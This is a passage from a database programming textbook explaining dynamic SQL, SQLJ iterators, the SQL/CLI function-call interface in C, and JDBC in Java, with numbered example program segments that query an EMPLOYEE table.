at runtime. For example, we may want to write a program that accepts an SQL query
typed from the monitor, executes it, and displays its result, such as the interactive
interfaces available for most relational DBMSs. Another example is when a user-
friendly interface generates SQL queries dynamically for the user based on point-
and-click operations on a graphical schema (for example, a QBE-like interface). In
this section, we give a brief overview of dynamic SQL, which is one technique for
writing this type of database program, by giving a simple example to illustrate how
dynamic SQL can work. In Section 3, we will describe another approach for dealing
with dynamic queries.

Program segment E3 in Figure 4 reads a string that is input by the user (that string
should be an SQL update command) into the string program variable
sqlupdatestring in line 3. It then prepares this as an SQL command in line 4 by
associating it with the SQL variable sqlcommand. Line 5 then executes the command.
Notice that in this case no syntax check or other types of checks on the command are
possible at compile time, since the SQL command is not available until runtime. This
contrasts with our previous examples of embedded SQL, where the query could be
checked at compile time because its text was in the program source code.

Although including a dynamic update command is relatively straightforward in
dynamic SQL, a dynamic query is much more complicated. This is because usually
we do not know the types or the number of attributes to be retrieved by the SQL
query when we are writing the program. A complex data structure is sometimes
needed to allow for different numbers and types of attributes in the query result if
no prior information is known about the dynamic query. Techniques similar to
those that we discuss in Section 3 can be used to assign query results (and query
parameters) to host program variables.

In E3, the reason for separating PREPARE and EXECUTE is that if the command is to
be executed multiple times in a program, it can be prepared only once. Preparing
the command generally involves syntax and other types of checks by the system, as


well as generating the code for executing it. It is possible to combine the PREPARE
and EXECUTE commands (lines 4 and 5 in E3) into a single statement by writing

EXEC SQL EXECUTE IMMEDIATE :sqlupdatestring ;

This is useful if the command is to be executed only once. Alternatively, the pro-
grammer can separate the two statements to catch any errors after the PREPARE
statement, if any.
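The same prepare-once, execute-many pattern appears in the function-call approach of Section 3: JDBC's PreparedStatement is prepared from a statement string that can be constructed at runtime and then executed repeatedly with different parameter values. A minimal sketch follows; the connection parameters, the raise amounts, and the department numbers are placeholders chosen only for illustration.

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;

public class DynamicUpdate {
    public static void main(String[] args) throws Exception {
        // Placeholders for the connection parameters (assumptions).
        try (Connection conn = DriverManager.getConnection(
                "jdbc:oracle:thin:@//dbserver:1521/company", "user", "password")) {
            // Prepare once: the statement text could also be read at runtime,
            // analogous to PREPARE in program segment E3.
            String sql = "UPDATE EMPLOYEE SET Salary = Salary + ? WHERE Dno = ?";
            try (PreparedStatement ps = conn.prepareStatement(sql)) {
                // Execute several times with different parameter values,
                // analogous to repeated EXECUTE commands.
                ps.setDouble(1, 500.0);
                ps.setInt(2, 5);
                ps.executeUpdate();

                ps.setDouble(1, 300.0);
                ps.setInt(2, 4);
                ps.executeUpdate();
            }
        }
    }
}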

2.4 SQLJ: Embedding SQL Commands in Java
In the previous subsections, we gave an overview of how SQL commands can be
embedded in a traditional programming language, using the C language in our
examples. We now turn our attention to how SQL can be embedded in an object-
oriented programming language,8 in particular, the Java language. SQLJ is a stan-
dard that has been adopted by several vendors for embedding SQL in Java.
Historically, SQLJ was developed after JDBC, which is used for accessing SQL data-
bases from Java using function calls. We discuss JDBC in Section 3.2. In this section,
we focus on SQLJ as it is used in the Oracle RDBMS. An SQLJ translator will gener-
ally convert SQL statements into Java, which can then be executed through the
JDBC interface. Hence, it is necessary to install a JDBC driver when using SQLJ.9 In
this section, we focus on how to use SQLJ concepts to write embedded SQL in a Java
program.

Before being able to process SQLJ with Java in Oracle, it is necessary to import sev-
eral class libraries, shown in Figure 5. These include the JDBC and IO classes (lines
1 and 2), plus the additional classes listed in lines 3, 4, and 5. In addition, the pro-
gram must first connect to the desired database using the function call
getConnection, which is one of the methods of the oracle class in line 5 of Figure 5.

Figure 5
Importing classes needed for including
SQLJ in Java programs in Oracle, and
establishing a connection and default
context.

1) import java.sql.* ;
2) import java.io.* ;
3) import sqlj.runtime.* ;
4) import sqlj.runtime.ref.* ;
5) import oracle.sqlj.runtime.* ;


6) DefaultContext cntxt =
7) oracle.getConnection("<url name>", "<user name>", "<password>", true) ;
8) DefaultContext.setDefaultContext(cntxt) ;

8This section assumes familiarity with object-oriented concepts and basic Java concepts.
9We discuss JDBC drivers in Section 3.2.


Figure 6
Java program vari-
ables used in SQLJ
examples J1 and J2.

1) String dname, ssn, fname, fn, lname, ln,
bdate, address ;

2) char sex, minit, mi ;
3) double salary, sal ;
4) int dno, dnumber ;

The format of this function call, which returns an object of type default context,10

is as follows:

public static DefaultContext
getConnection(String url, String user, String password,
Boolean autoCommit)
throws SQLException ;

For example, we can write the statements in lines 6 through 8 in Figure 5 to connect
to an Oracle database located at <url name> using the login of <user name> with password <password> and with automatic commitment of each command,11 and
then set this connection as the default context for subsequent commands.

In the following examples, we will not show complete Java classes or programs since
it is not our intention to teach Java. Rather, we will show program segments that
illustrate the use of SQLJ. Figure 6 shows the Java program variables used in our
examples. Program segment J1 in Figure 7 reads an employee’s Ssn and prints some
of the employee’s information from the database.

Notice that because Java already uses the concept of exceptions for error handling,
a special exception called SQLException is used to return errors or exception con-
ditions after executing an SQL database command. This plays a similar role to
SQLCODE and SQLSTATE in embedded SQL. Java has many types of predefined
exceptions. Each Java operation (function) must specify the exceptions that can be
thrown—that is, the exception conditions that may occur while executing the Java
code of that operation. If a defined exception occurs, the system transfers control to
the Java code specified for exception handling. In J1, exception handling for an
SQLException is specified in lines 7 and 8. In Java, the following structure

try {<code segment 1>} catch (<exception>) {<code segment 2>}

is used to deal with exceptions that occur during the execution of <code segment 1>. If
no exception occurs, <code segment 1> is processed directly. Exceptions

10A default context, when set, applies to subsequent commands in the program until it is changed.
11Automatic commitment roughly means that each command is applied to the database after it is exe-
cuted. The alternative is that the programmer wants to execute several related database commands and
then commit them together.


Figure 7
Program segment J1,
a Java program seg-
ment with SQLJ.

//Program Segment J1:
1) ssn = readEntry("Enter a Social Security Number: ") ;
2) try {
3) #sql { select Fname, Minit, Lname, Address, Salary
4) into :fname, :minit, :lname, :address, :salary
5) from EMPLOYEE where Ssn = :ssn} ;
6) } catch (SQLException se) {
7) System.out.println("Social Security Number does not exist: " + ssn) ;
8) return ;
9) }
10) System.out.println(fname + " " + minit + " " + lname + " " + address

+ " " + salary) ;

that can be thrown by the code in a particular operation should be specified as part
of the operation declaration or interface—for example, in the following format:

<operation return type> <operation name>(<parameters>)
throws SQLException, IOException ;

In SQLJ, the embedded SQL commands within a Java program are preceded by
#sql, as illustrated in J1 line 3, so that they can be identified by the preprocessor.
The #sql is used instead of the keywords EXEC SQL that are used in embedded SQL
with the C programming language (see Section 2.1). SQLJ uses an INTO clause—
similar to that used in embedded SQL—to return the attribute values retrieved
from the database by an SQL query into Java program variables. The program vari-
ables are preceded by colons (:) in the SQL statement, as in embedded SQL.

In J1 a single tuple is retrieved by the embedded SQLJ query; that is why we are able
to assign its attribute values directly to Java program variables in the INTO clause in
line 4 in Figure 7. For queries that retrieve many tuples, SQLJ uses the concept of an
iterator, which is similar to a cursor in embedded SQL.

2.5 Retrieving Multiple Tuples in SQLJ Using Iterators
In SQLJ, an iterator is a type of object associated with a collection (set or multiset)
of records in a query result.12 The iterator is associated with the tuples and attrib-
utes that appear in a query result. There are two types of iterators:

1. A named iterator is associated with a query result by listing the attribute
names and types that appear in the query result. The attribute names must
correspond to appropriately declared Java program variables, as shown in
Figure 6.

2. A positional iterator lists only the attribute types that appear in the query
result.

12We will not discuss iterators in more detail here.


Figure 8
Program segment J2A, a Java program segment that uses a named iterator to
print employee information in a particular department.

//Program Segment J2A:
0) dname = readEntry("Enter the Department Name: ") ;
1) try {
2) #sql { select Dnumber into :dnumber
3) from DEPARTMENT where Dname = :dname} ;
4) } catch (SQLException se) {
5) System.out.println("Department does not exist: " + dname) ;
6) return ;
7) }
8) System.out.println("Employee information for Department: " + dname) ;
9) #sql iterator Emp(String ssn, String fname, String minit, String lname,

double salary) ;
10) Emp e = null ;
11) #sql e = { select ssn, fname, minit, lname, salary
12) from EMPLOYEE where Dno = :dnumber} ;
13) while (e.next()) {
14) System.out.println(e.ssn + " " + e.fname + " " + e.minit + " " +

e.lname + " " + e.salary) ;
15) } ;
16) e.close() ;

In both cases, the list should be in the same order as the attributes that are listed in
the SELECT clause of the query. However, looping over a query result is different for
the two types of iterators, as we shall see. First, we show an example of using a
named iterator in Figure 8, program segment J2A. Line 9 in Figure 8 shows how a
named iterator type Emp is declared. Notice that the names of the attributes in a
named iterator type must match the names of the attributes in the SQL query result.
Line 10 shows how an iterator object e of type Emp is created in the program and
then associated with a query (lines 11 and 12).

When the iterator object is associated with a query (lines 11 and 12 in Figure 8), the
program fetches the query result from the database and sets the iterator to a posi-
tion before the first row in the result of the query. This becomes the current row for
the iterator. Subsequently, next operations are issued on the iterator object; each
next moves the iterator to the next row in the result of the query, making it the cur-
rent row. If the row exists, the operation retrieves the attribute values for that row
into the corresponding program variables. If no more rows exist, the next opera-
tion returns NULL, and can thus be used to control the looping. Notice that the
named iterator does not need an INTO clause, because the program variables corre-
sponding to the retrieved attributes are already specified when the iterator type is
declared (line 9 in Figure 8).


In Figure 8, the command (e.next()) in line 13 performs two functions: It gets
the next tuple in the query result and controls the while loop. Once the program is
done with processing the query result, the command e.close() (line 16) closes the
iterator.

Next, consider the same example using positional iterators as shown in Figure 9
(program segment J2B). Line 9 in Figure 9 shows how a positional iterator type
Emppos is declared. The main difference between this and the named iterator is that
there are no attribute names (corresponding to program variable names) in the
positional iterator—only attribute types. This can provide more flexibility, but
makes the processing of the query result slightly more complex. The attribute types
must still be compatible with the attribute types in the SQL query result and in
the same order. Line 10 shows how a positional iterator object e of type Emppos is
created in the program and then associated with a query (lines 11 and 12).

The positional iterator behaves in a manner that is more similar to embedded SQL
(see Section 2.2). A FETCH <iterator variable> INTO <program variables>
command is needed to get the next tuple in a query result. The first time fetch is exe-
cuted, it gets the first tuple (line 13 in Figure 9). Line 16 gets the next tuple until no
more tuples exist in the query result. To control the loop, a positional iterator func-
tion e.endFetch() is used. This function is set to a value of TRUE when the itera-
tor is initially associated with an SQL query (line 11), and is set to FALSE each time

Figure 9
Program segment J2B, a Java program segment that uses a positional
iterator to print employee information in a particular department.

//Program Segment J2B:
0) dname = readEntry("Enter the Department Name: ") ;
1) try {
2) #sql { select Dnumber into :dnumber
3) from DEPARTMENT where Dname = :dname} ;
4) } catch (SQLException se) {
5) System.out.println("Department does not exist: " + dname) ;
6) return ;
7) }
8) System.out.println("Employee information for Department: " + dname) ;
9) #sql iterator Emppos(String, String, String, String, double) ;
10) Emppos e = null ;
11) #sql e = { select ssn, fname, minit, lname, salary
12) from EMPLOYEE where Dno = :dnumber} ;
13) #sql { fetch :e into :ssn, :fn, :mi, :ln, :sal} ;
14) while (!e.endFetch()) {
15) System.out.println(ssn + " " + fn + " " + mi + " " + ln + " " + sal) ;
16) #sql { fetch :e into :ssn, :fn, :mi, :ln, :sal} ;
17) } ;
18) e.close() ;


a fetch command returns a valid tuple from the query result. It is set to TRUE again
when a fetch command does not find any more tuples. Line 14 shows how the loop-
ing is controlled by negation.

3 Database Programming with Function Calls:
SQL/CLI and JDBC

Embedded SQL (see Section 2) is sometimes referred to as a static database pro-
gramming approach because the query text is written within the program source
code and cannot be changed without recompiling or reprocessing the source code.
The use of function calls is a more dynamic approach for database programming
than embedded SQL. We already saw one dynamic database programming tech-
nique—dynamic SQL—in Section 2.3. The techniques discussed here provide
another approach to dynamic database programming. A library of functions, also
known as an application programming interface (API), is used to access the data-
base. Although this provides more flexibility because no preprocessor is needed, one
drawback is that syntax and other checks on SQL commands have to be done at
runtime. Another drawback is that it sometimes requires more complex program-
ming to access query results because the types and numbers of attributes in a query
result may not be known in advance.

In this section, we give an overview of two function call interfaces. We first discuss
the SQL Call Level Interface (SQL/CLI), which is part of the SQL standard. This
was developed as a follow-up to the earlier technique known as ODBC (Open
Database Connectivity). We use C as the host language in our SQL/CLI examples.
Then we give an overview of JDBC, which is the call function interface for accessing
databases from Java. Although it is commonly assumed that JDBC stands for Java
Database Connectivity, JDBC is just a registered trademark of Sun Microsystems,
not an acronym.

The main advantage of using a function call interface is that it makes it easier to
access multiple databases within the same application program, even if they are
stored under different DBMS packages. We discuss this further in Section 3.2 when
we discuss Java database programming with JDBC, although this advantage also
applies to database programming with SQL/CLI and ODBC (see Section 3.1).
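As a concrete, if simplified, illustration of this point, the following hypothetical JDBC sketch opens connections to two data sources from one Java program; the URL strings, account names, and passwords are placeholders, and how connections are actually established is explained in Section 3.2.

import java.sql.* ;

class TwoDataSourcesSketch {
    // Holds connections to two data sources at the same time. Each connection
    // is obtained through the driver registered for that data source.
    static void accessTwoSources() throws SQLException {
        Connection first = DriverManager.getConnection("jdbc:oracle:oci8:acct1/pass1") ;
        // A second data source, possibly managed by a different DBMS, is opened
        // the same way using that vendor's driver and URL format (placeholder):
        Connection second = DriverManager.getConnection("jdbc:oracle:oci8:acct2/pass2") ;
        // ... queries on first and updates on second, using the techniques of Section 3.2 ...
        second.close() ;
        first.close() ;
    }
}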

3.1 Database Programming with SQL/CLI Using C
as the Host Language

Before using the function calls in SQL/CLI, it is necessary to install the appropriate
library packages on the database server. These packages are obtained from the ven-
dor of the DBMS being used. We now give an overview of how SQL/CLI can be used
in a C program.13 We will illustrate our presentation with the sample program seg-
ment CLI1 shown in Figure 10.

13Our discussion here also applies to the C++ programming language, since we do not use any of the
object-oriented features but focus on the database programming mechanism.


When using SQL/CLI, the SQL statements are dynamically created and passed as
string parameters in the function calls. Hence, it is necessary to keep track of the
information about host program interactions with the database in runtime data
structures because the database commands are processed at runtime. The informa-
tion is kept in four types of records, represented as structs in C data types. An
environment record is used as a container to keep track of one or more database
connections and to set environment information. A connection record keeps track
of the information needed for a particular database connection. A statement record
keeps track of the information needed for one SQL statement. A description record
keeps track of the information about tuples or parameters—for example, the num-
ber of attributes and their types in a tuple, or the number and types of parameters in
a function call. This is needed when the programmer does not know this informa-
tion about the query when writing the program. In our examples, we assume that the
programmer knows the exact query, so we do not show any description records.

Each record is accessible to the program through a C pointer variable—called a
handle to the record. The handle is returned when a record is first created. To create
a record and return its handle, the following SQL/CLI function is used:

SQLAllocHandle(<handle_type>, <handle_1>, <handle_2>)

Figure 10
Program segment CLI1, a C program
segment with SQL/CLI.

//Program CLI1:
0) #include sqlcli.h ;
1) void printSal() {
2) SQLHSTMT stmt1 ;
3) SQLHDBC con1 ;
4) SQLHENV env1 ;
5) SQLRETURN ret1, ret2, ret3, ret4 ;
6) ret1 = SQLAllocHandle(SQL_HANDLE_ENV, SQL_NULL_HANDLE, &env1) ;
7) if (!ret1) ret2 = SQLAllocHandle(SQL_HANDLE_DBC, env1, &con1) else exit ;
8) if (!ret2) ret3 = SQLConnect(con1, "dbs", SQL_NTS, "js", SQL_NTS, "xyz",

SQL_NTS) else exit ;
9) if (!ret3) ret4 = SQLAllocHandle(SQL_HANDLE_STMT, con1, &stmt1) else exit ;
10) SQLPrepare(stmt1, "select Lname, Salary from EMPLOYEE where Ssn = ?",

SQL_NTS) ;
11) prompt("Enter a Social Security Number: ", ssn) ;
12) SQLBindParameter(stmt1, 1, SQL_CHAR, &ssn, 9, &fetchlen1) ;
13) ret1 = SQLExecute(stmt1) ;
14) if (!ret1) {
15) SQLBindCol(stmt1, 1, SQL_CHAR, &lname, 15, &fetchlen1) ;
16) SQLBindCol(stmt1, 2, SQL_FLOAT, &salary, 4, &fetchlen2) ;
17) ret2 = SQLFetch(stmt1) ;
18) if (!ret2) printf(ssn, lname, salary)
19) else printf("Social Security Number does not exist: ", ssn) ;
20) }
21) }


In this function, the parameters are as follows:

<handle_type> indicates the type of record being created. The possible val-
ues for this parameter are the keywords SQL_HANDLE_ENV,
SQL_HANDLE_DBC, SQL_HANDLE_STMT, or SQL_HANDLE_DESC, for an envi-
ronment, connection, statement, or description record, respectively.

<handle_1> indicates the container within which the new handle is being
created. For example, for a connection record this would be the environment
within which the connection is being created, and for a statement record this
would be the connection for that statement.

<handle_2> is the pointer (handle) to the newly created record of type
<handle_type>.

When writing a C program that will include database calls through SQL/CLI, the
following are the typical steps that are taken. We illustrate the steps by referring to
the example CLI1 in Figure 10, which reads a Social Security number of an
employee and prints the employee’s last name and salary.

1. The library of functions comprising SQL/CLI must be included in the C pro-
gram. This is called sqlcli.h, and is included using line 0 in Figure 10.

2. Declare handle variables of types SQLHSTMT, SQLHDBC, SQLHENV, and
SQLHDESC for the statements, connections, environments, and descriptions
needed in the program, respectively (lines 2 to 4).14 Also declare variables of
type SQLRETURN (line 5) to hold the return codes from the SQL/CLI func-
tion calls. A return code of 0 (zero) indicates successful execution of the func-
tion call.

3. An environment record must be set up in the program using
SQLAllocHandle. The function to do this is shown in line 6. Because an
environment record is not contained in any other record, the parameter
<handle_1> is the NULL handle SQL_NULL_HANDLE (NULL pointer) when
creating an environment. The handle (pointer) to the newly created environ-
ment record is returned in variable env1 in line 6.

4. A connection record is set up in the program using SQLAllocHandle. In line
7, the connection record created has the handle con1 and is contained in the
environment env1. A connection is then established in con1 to a particular
server database using the SQLConnect function of SQL/CLI (line 8). In our
example, the database server name we are connecting to is dbs and the
account name and password for login are js and xyz, respectively.

5. A statement record is set up in the program using SQLAllocHandle. In line
9, the statement record created has the handle stmt1 and uses the connec-
tion con1.

6. The statement is prepared using the SQL/CLI function SQLPrepare. In line
10, this assigns the SQL statement string (the query in our example) to the

14To keep our presentation simple, we will not show description records here.


statement handle stmt1. The question mark (?) symbol in line 10 represents
a statement parameter, which is a value to be determined at runtime—typ-
ically by binding it to a C program variable. In general, there could be several
parameters in a statement string. They are distinguished by the order of
appearance of the question marks in the statement string (the first ? repre-
sents parameter 1, the second ? represents parameter 2, and so on). The last
parameter in SQLPrepare should give the length of the SQL statement
string in bytes, but if we enter the keyword SQL_NTS, this indicates that the
string holding the query is a NULL-terminated string so that SQL can calcu-
late the string length automatically. This use of SQL_NTS also applies to other
string parameters in the function calls in our examples.

7. Before executing the query, any parameters in the query string should be
bound to program variables using the SQL/CLI function
SQLBindParameter. In Figure 10, the parameter (indicated by ?) to the pre-
pared query referenced by stmt1 is bound to the C program variable ssn in
line 12. If there are n parameters in the SQL statement, we should have n
SQLBindParameter function calls, each with a different parameter position
(1, 2, …, n).

8. Following these preparations, we can now execute the SQL statement refer-
enced by the handle stmt1 using the function SQLExecute (line 13). Notice
that although the query will be executed in line 13, the query results have not
yet been assigned to any C program variables.

9. In order to determine where the result of the query is returned, one common
technique is the bound columns approach. Here, each column in a query
result is bound to a C program variable using the SQLBindCol function. The
columns are distinguished by their order of appearance in the SQL query. In
Figure 10 lines 15 and 16, the two columns in the query (Lname
and Salary) are bound to the C program variables lname and salary,
respectively.15

10. Finally, in order to retrieve the column values into the C program variables,
the function SQLFetch is used (line 17). This function is similar to the
FETCH command of embedded SQL. If a query result has a collection of
tuples, each SQLFetch call gets the next tuple and returns its column values
into the bound program variables. SQLFetch returns an exception
(nonzero) code if there are no more tuples in the query result.16

15An alternative technique known as unbound columns uses different SQL/CLI functions, namely
SQLGetCol or SQLGetData, to retrieve columns from the query result without previously binding them;
these are applied after the SQLFetch command in line 17.
16If unbound program variables are used, SQLFetch returns the tuple into a temporary program area.
Each subsequent SQLGetCol (or SQLGetData) returns one attribute value in order. Basically, for each
row in the query result, the program should iterate over the attribute values (columns) in that row. This is
useful if the number of columns in the query result is variable.


Figure 11
Program segment CLI2, a C program segment that uses SQL/CLI
for a query with a collection of tuples in its result.

//Program Segment CLI2:
0) #include sqlcli.h ;
1) void printDepartmentEmps() {
2) SQLHSTMT stmt1 ;
3) SQLHDBC con1 ;
4) SQLHENV env1 ;
5) SQLRETURN ret1, ret2, ret3, ret4 ;
6) ret1 = SQLAllocHandle(SQL_HANDLE_ENV, SQL_NULL_HANDLE, &env1) ;
7) if (!ret1) ret2 = SQLAllocHandle(SQL_HANDLE_DBC, env1, &con1) else exit ;
8) if (!ret2) ret3 = SQLConnect(con1, "dbs", SQL_NTS, "js", SQL_NTS, "xyz",

SQL_NTS) else exit ;
9) if (!ret3) ret4 = SQLAllocHandle(SQL_HANDLE_STMT, con1, &stmt1) else exit ;
10) SQLPrepare(stmt1, "select Lname, Salary from EMPLOYEE where Dno = ?",

SQL_NTS) ;
11) prompt("Enter the Department Number: ", dno) ;
12) SQLBindParameter(stmt1, 1, SQL_INTEGER, &dno, 4, &fetchlen1) ;
13) ret1 = SQLExecute(stmt1) ;
14) if (!ret1) {
15) SQLBindCol(stmt1, 1, SQL_CHAR, &lname, 15, &fetchlen1) ;
16) SQLBindCol(stmt1, 2, SQL_FLOAT, &salary, 4, &fetchlen2) ;
17) ret2 = SQLFetch(stmt1) ;
18) while (!ret2) {
19) printf(lname, salary) ;
20) ret2 = SQLFetch(stmt1) ;
21) }
22) }
23) }

As we can see, using dynamic function calls requires a lot of preparation to set up
the SQL statements and to bind statement parameters and query results to the
appropriate program variables.

In CLI1 a single tuple is selected by the SQL query. Figure 11 shows an example of
retrieving multiple tuples. We assume that appropriate C program variables have
been declared as in Figure 1. The program segment in CLI2 reads (inputs) a depart-
ment number and then retrieves the employees who work in that department. A
loop then iterates over each employee record, one at a time, and prints the
employee’s last name and salary.


3.2 JDBC: SQL Function Calls for Java Programming
We now turn our attention to how SQL can be called from the Java object-oriented
programming language.17 The function libraries for this access are known as
JDBC.18 The Java programming language was designed to be platform indepen-
dent—that is, a program should be able to run on any type of computer system that
has a Java interpreter installed. Because of this portability, many RDBMS vendors
provide JDBC drivers so that it is possible to access their systems via Java programs.
A JDBC driver is basically an implementation of the function calls specified in the
JDBC application programming interface (API) for a particular vendor’s RDBMS.
Hence, a Java program with JDBC function calls can access any RDBMS that has a
JDBC driver available.

Because Java is object-oriented, its function libraries are implemented as classes.
Before being able to process JDBC function calls with Java, it is necessary to import
the JDBC class libraries, which are called java.sql.*. These can be downloaded
and installed via the Web.19

JDBC is designed to allow a single Java program to connect to several different data-
bases. These are sometimes called the data sources accessed by the Java program.
These data sources could be stored using RDBMSs from different vendors and could
reside on different machines. Hence, different data source accesses within the same
Java program may require JDBC drivers from different vendors. To achieve this flex-
ibility, a special JDBC class called the driver manager class is employed, which keeps
track of the installed drivers. A driver should be registered with the driver manager
before it is used. The operations (methods) of the driver manager class include
getDriver, registerDriver, and deregisterDriver. These can be used to add
and remove drivers dynamically. Other functions set up and close connections to
data sources, as we will see.

To load a JDBC driver explicitly, the generic Java function for loading a class can be
used. For example, to load the JDBC driver for the Oracle RDBMS, the following
command can be used:

Class.forName("oracle.jdbc.driver.OracleDriver")

This will register the driver with the driver manager and make it available to the
program. It is also possible to load and register the driver(s) needed in the com-
mand line that runs the program, for example, by including the following in the
command line:

-Djdbc.drivers=oracle.jdbc.driver.OracleDriver

17This section assumes familiarity with object-oriented concepts and basic Java concepts.
18As we mentioned earlier, JDBC is a registered trademark of Sun Microsystems, although it is com-
monly thought to be an acronym for Java Database Connectivity.
19These are available from several Web sites—for example, at http://industry.java.sun.com/products/
jdbc/drivers.


Figure 12
Program segment JDBC1, a Java program segment with JDBC.

//Program JDBC1:
0) import java.io.* ;
1) import java.sql.* ;


2) class getEmpInfo {
3) public static void main (String args []) throws SQLException, IOException {
4) try { Class.forName("oracle.jdbc.driver.OracleDriver") ;
5) } catch (ClassNotFoundException x) {
6) System.out.println ("Driver could not be loaded") ;
7) }
8) String dbacct, passwrd, ssn, lname ;
9) Double salary ;
10) dbacct = readentry("Enter database account:") ;
11) passwrd = readentry("Enter password:") ;
12) Connection conn = DriverManager.getConnection
13) ("jdbc:oracle:oci8:" + dbacct + "/" + passwrd) ;
14) String stmt1 = "select Lname, Salary from EMPLOYEE where Ssn = ?" ;
15) PreparedStatement p = conn.prepareStatement(stmt1) ;
16) ssn = readentry("Enter a Social Security Number: ") ;
17) p.clearParameters() ;
18) p.setString(1, ssn) ;
19) ResultSet r = p.executeQuery() ;
20) while (r.next()) {
21) lname = r.getString(1) ;
22) salary = r.getDouble(2) ;
23) System.out.println(lname + " " + salary) ;
24) } }
25) }

The following are typical steps that are taken when writing a Java application pro-
gram with database access through JDBC function calls. We illustrate the steps by
referring to the example JDBC1 in Figure 12, which reads a Social Security number
of an employee and prints the employee’s last name and salary.

1. The JDBC library of classes must be imported into the Java program. These
classes are called java.sql.*, and can be imported using line 1 in Figure
12. Any additional Java class libraries needed by the program must also be
imported.

2. Load the JDBC driver as discussed previously (lines 4 to 7). The Java excep-
tion in line 5 occurs if the driver is not loaded successfully.

3. Create appropriate variables as needed in the Java program (lines 8 and 9).


4. The Connection object. A connection object is created using the
getConnection function of the DriverManager class of JDBC. In lines 12
and 13, the Connection object is created by using the function call
getConnection(urlstring), where urlstring has the form

jdbc:oracle:<driver type>:<dbaccount>/<password>

An alternative form is

getConnection(url, dbaccount, password)

Various properties can be set for a connection object, but they are mainly
related to transactional properties.

5. The Statement object. A statement object is created in the program. In
JDBC, there is a basic statement class, Statement, with two specialized sub-
classes: PreparedStatement and CallableStatement. The example in
Figure 12 illustrates how PreparedStatement objects are created and used.
The next example (Figure 13) illustrates the other type of Statement

Figure 13
Program segment JDBC2, a Java program
segment that uses JDBC for a query with a
collection of tuples in its result.

//Program Segment JDBC2:
0) import java.io.* ;
1) import java.sql.* ;


2) class printDepartmentEmps {
3) public static void main (String args [])

throws SQLException, IOException {
4) try { Class.forName("oracle.jdbc.driver.OracleDriver") ;
5) } catch (ClassNotFoundException x) {
6) System.out.println ("Driver could not be loaded") ;
7) }
8) String dbacct, passwrd, lname ;
9) Double salary ;
10) Integer dno ;
11) dbacct = readentry("Enter database account:") ;
12) passwrd = readentry("Enter password:") ;
13) Connection conn = DriverManager.getConnection
14) ("jdbc:oracle:oci8:" + dbacct + "/" + passwrd) ;
15) dno = Integer.valueOf(readentry("Enter a Department Number: ")) ;
16) String q = "select Lname, Salary from EMPLOYEE where Dno = " +

dno.toString() ;
17) Statement s = conn.createStatement() ;
18) ResultSet r = s.executeQuery(q) ;
19) while (r.next()) {
20) lname = r.getString(1) ;
21) salary = r.getDouble(2) ;
22) System.out.println(lname + " " + salary) ;
23) } }
24) }


objects. In line 14 in Figure 12, a query string with a single parameter—indi-
cated by the ? symbol—is created in the string variable stmt1. In line 15, an
object p of type PreparedStatement is created based on the query string in
stmt1 and using the connection object conn. In general, the programmer
should use PreparedStatement objects if a query is to be executed multiple
times, since it would be prepared, checked, and compiled only once, thus sav-
ing this cost for the additional executions of the query.

6. Setting the statement parameters. The question mark (?) symbol in line 14
represents a statement parameter, which is a value to be determined at run-
time, typically by binding it to a Java program variable. In general, there
could be several parameters, distinguished by the order of appearance of the
question marks within the statement string (first ? represents parameter 1,
second ? represents parameter 2, and so on), as we discussed previously.

7. Before executing a PreparedStatement query, any parameters should be
bound to program variables. Depending on the type of the parameter, differ-
ent functions such as setString, setInt, setDouble, and so on are
applied to the PreparedStatement object to set its parameters. The appro-
priate function should be used to correspond to the data type of the param-
eter being set. In Figure 12, the parameter (indicated by ?) in object p is
bound to the Java program variable ssn in line 18. The function setString
is used because ssn is a string variable. If there are n parameters in the SQL
statement, we should have n set… functions, each with a different param-
eter position (1, 2, …, n). Generally, it is advisable to clear all parameters
before setting any new values (line 17).

8. Following these preparations, we can now execute the SQL statement refer-
enced by the object p using the function executeQuery (line 19). There is a
generic function execute in JDBC, plus two specialized functions:
executeUpdate and executeQuery. executeUpdate is used for SQL
insert, delete, or update statements, and returns an integer value indicating
the number of tuples that were affected. executeQuery is used for SQL
retrieval statements, and returns an object of type ResultSet, which we dis-
cuss next.

9. The ResultSet object. In line 19, the result of the query is returned in an
object r of type ResultSet. This resembles a two-dimensional array or a
table, where the tuples are the rows and the attributes returned are the
columns. A ResultSet object is similar to a cursor in embedded SQL and
an iterator in SQLJ. In our example, when the query is executed, r refers to a
tuple before the first tuple in the query result. The r.next() function (line
20) moves to the next tuple (row) in the ResultSet object and returns FALSE
if there are no more rows. This is used to control the looping. The pro-
grammer can refer to the attributes in the current tuple using various
get… functions that depend on the type of each attribute (for example,
getString, getInt, getDouble, and so on). The programmer can
either use the attribute positions (1, 2) or the actual attribute names
(“Lname”, “Salary”) with the get… functions. In our examples, we used
the positional notation in lines 21 and 22.

In general, the programmer can check for SQL exceptions after each JDBC function
call. We did not do this to simplify the examples.
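As a rough sketch of what such checking might look like, the following segment, which is not part of JDBC1 or JDBC2, wraps the JDBC calls in a try-catch block, accesses the result columns by attribute name rather than by position, and uses executeUpdate to obtain the number of affected tuples; the department number 5, the salary update, and the surrounding Connection object conn (created as in Figure 12) are illustrative assumptions.

try {
    PreparedStatement p = conn.prepareStatement(
        "select Lname, Salary from EMPLOYEE where Dno = ?") ;
    p.setInt(1, 5) ;                              // illustrative department number
    ResultSet r = p.executeQuery() ;
    while (r.next()) {
        String lname = r.getString("Lname") ;     // access by attribute name
        double sal = r.getDouble("Salary") ;      // rather than by position
        System.out.println(lname + " " + sal) ;
    }
    r.close() ;
    p.close() ;
    Statement s = conn.createStatement() ;
    int changed = s.executeUpdate(                // executeUpdate returns a count
        "update EMPLOYEE set Salary = Salary * 1.05 where Dno = 5") ;
    System.out.println(changed + " tuple(s) updated") ;
    s.close() ;
} catch (SQLException se) {
    System.out.println("Database error: " + se.getMessage()) ;
}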

Notice that JDBC does not distinguish between queries that return single tuples and
those that return multiple tuples, unlike some of the other techniques. This is justi-
fiable because a single tuple result set is just a special case.

In example JDBC1, a single tuple is selected by the SQL query, so the loop in lines 20
to 24 is executed at most once. The example shown in Figure 13 illustrates the
retrieval of multiple tuples. The program segment in JDBC2 reads (inputs) a
department number and then retrieves the employees who work in that depart-
ment. A loop then iterates over each employee record, one at a time, and prints the
employee’s last name and salary. This example also illustrates how we can execute a
query directly, without having to prepare it as in the previous example. This tech-
nique is preferred for queries that will be executed only once, since it is simpler to
program. In line 17 of Figure 13, the programmer creates a Statement object
(instead of PreparedStatement, as in the previous example) without associating it
with a particular query string. The query string q is passed to the statement object s
when it is executed in line 18.

